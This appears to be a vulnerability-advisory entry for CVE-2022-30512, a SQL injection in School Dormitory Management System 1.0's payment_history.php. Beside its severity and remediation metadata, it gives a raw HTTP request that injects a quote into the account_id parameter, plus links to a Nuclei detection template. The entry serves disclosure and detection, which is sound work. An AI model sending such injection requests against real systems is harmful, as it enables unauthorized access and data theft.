| Title | School Dormitory Management System 1.0 - SQL Injection |
|---|---|
| Author | tess |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the School Dormitory Management System 1.0. |
| CVSS Score | 9.8 |
| EPSS Score | 0.71786 |
| CVE ID | CVE-2022-30512 |
| CWE ID | CWE-89 |
| Tags | cve cve2022 sqli school_dormitory_management_system_project vuln |
School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
GET /dms/admin/accounts/payment_history.php?account_id=2%27 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-30512.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-30512.pcap
N/AN/A